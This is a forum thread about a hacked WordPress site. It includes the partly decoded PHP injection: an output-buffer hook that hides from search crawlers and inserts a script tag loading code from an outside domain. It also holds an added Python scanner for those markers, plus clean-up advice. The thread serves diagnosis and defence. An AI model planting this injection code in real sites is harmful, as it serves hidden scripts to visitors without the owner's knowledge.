Wordpress Hosted Site Hacked?

The base64 thing is a complete pain. I had it happen to someone's shop (they didn't have backups) and it infected hundreds of files.

Did you save the string before deleting it? If you can post it I can probably tell you which files it infected / was using for the infection.

Looks like you've cleared the redirect now though.
 
This type of attack is commonly seen when your FTP details have been leaked or sniffed. Change all of your passwords, and check any PCs you use for trojans/keyloggers/malware.
 
Here you go:

Could this have infected any other files outside of Wordpress? Image files etc?

Would it be wise to change my FTP password and database information?

The hack I saw infected all .php files and probably more; check the contents of .htaccess to make sure it's not doing something in there too.

As above it could have come from malware on your PC which is stealing Filezilla passwords. On the store I looked at it looked like it might have come from exploiting one of the admin files; make sure you use the latest version of Wordpress and keep it up to date.
Here's the "decrypted" code from above if you're interested, it's still obfuscated and somewhat of a pain to decrypt:

PHP:
// Guard: run only once per request, and only where output buffering is available.
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])) {
	
	$GLOBALS['mr_no']=1;

	if(!function_exists('mrobh')) {

		if(!function_exists('gml')) {
			// Returns the injected <script> tag (the base64 string below decodes to it),
			// but returns nothing when the user agent looks like a googlebot/yahoo crawler.
			function gml() {
				if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
					return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly93d3cua2Rqa2Zqc2tkZmpsc2tkamYuY29tL2pzLnBocCI+PC9zY3JpcHQ+");
				}
				
				return "";
			}
		}

		if(!function_exists('gzdecode')) {

			// Polyfill for gzdecode() on PHP builds that lack it: walks the gzip header
			// flags (FHCRC=2, FEXTRA=4, FNAME=8, FCOMMENT=16) to find where the deflate
			// stream starts, then inflates it. Falls back to the raw input on failure.
			function gzdecode($R5A9CF1B497502ACA23C8F611A564684C) {

				$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
				$RBE4C4D037E939226F65812885A53DAD9=10;
				$RA3D52E52A48936CDE0F5356BB08652F2=0;

				if($R30B2AB8DC1496D06B230A71D8962AF5D&4) {
					$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
					$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
					$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
				}

				if($R30B2AB8DC1496D06B230A71D8962AF5D&8) {
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
				}

				if($R30B2AB8DC1496D06B230A71D8962AF5D&16) {
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
				}

				if($R30B2AB8DC1496D06B230A71D8962AF5D&2) {
					$RBE4C4D037E939226F65812885A53DAD9+=2;
				}

				$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));

				if($R034AE2AB94F99CC81B389A1822DA3353===FALSE) {
					$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
				}

				return $R034AE2AB94F99CC81B389A1822DA3353;
			}
		}

		// Output-buffer callback: decompresses the page if it was gzipped, then inserts
		// the script tag just before </body> (or appends it when no </body> is present).
		function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) {
			Header('Content-Encoding: none');
			$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);

			if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {
				return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
			} else {
				return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
			}
		}

		// Register the callback so every page served through this file gets the injection.
		ob_start('mrobh');
	} 
}
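Since the thread says the injection landed in hundreds of .php files, a scanner that walks the web root for the markers visible in the code above (the `mr_no` global, the `mrobh` callback, and literal `base64_decode` arguments that decode to a script tag) is the practical clean-up aid. This is an added example, not code from the thread; the sample strings are constructed, and the `scan_source`/`scan_tree` names are the example's own.

```python
import base64
import binascii
import os
import re
from typing import Dict, List

# Markers taken from the injected code posted in this thread.
MARKERS = ("$GLOBALS['mr_no']", "function mrobh", "ob_start('mrobh')")
# Matches base64_decode("...") / base64_decode('...') with a literal argument.
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)""")

# Constructed sample modelled on the injection above (not a real file from the thread).
SAMPLE_INFECTED = (
    "<?php if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])) {\n"
    "$GLOBALS['mr_no']=1; function mrobh($b){ return $b.base64_decode("
    "\"PHNjcmlwdCBzcmM9Imh0dHA6Ly93d3cua2Rqa2Zqc2tkZmpsc2tkamYuY29tL2pzLnBocCI+PC9zY3JpcHQ+\"); }"
    " ob_start('mrobh'); } ?>"
)
# A legitimate base64_decode call on its own should not be flagged.
SAMPLE_CLEAN = "<?php echo base64_decode('aGVsbG8='); ?>"


def scan_source(src: str) -> Dict[str, object]:
    """Report which markers appear and what any literal base64 arguments decode to."""
    found = [m for m in MARKERS if m in src]
    decoded: List[str] = []
    for _, blob in B64_CALL.findall(src):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (ValueError, binascii.Error):
            continue  # not valid base64; ignore
    suspicious = bool(found) or any("<script" in d.lower() for d in decoded)
    return {"markers": found, "decoded": decoded, "suspicious": suspicious}


def scan_tree(root: str) -> Dict[str, Dict[str, object]]:
    """Walk root and return the scan result for every .php or .htaccess file that is flagged."""
    hits: Dict[str, Dict[str, object]] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not (name.endswith(".php") or name == ".htaccess"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = scan_source(fh.read())
            except OSError:
                continue
            if result["suspicious"]:
                hits[path] = result
    return hits
```

Run `scan_tree("/path/to/webroot")` on a copy of the site; every path it returns needs the injected block removed or the file restored from a known-clean copy.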
 
That .htaccess looks fine. Might be a good idea to look at scheduling backups of all the files in future just in case though.

You should be able to keep your database (but reset all passwords) if you have a lot of content especially.
 
Is it not just as likely to be a bug in Wordpress that caused the infection? Wordpress do release updates to fix exploits but you still have to install them yourself.
 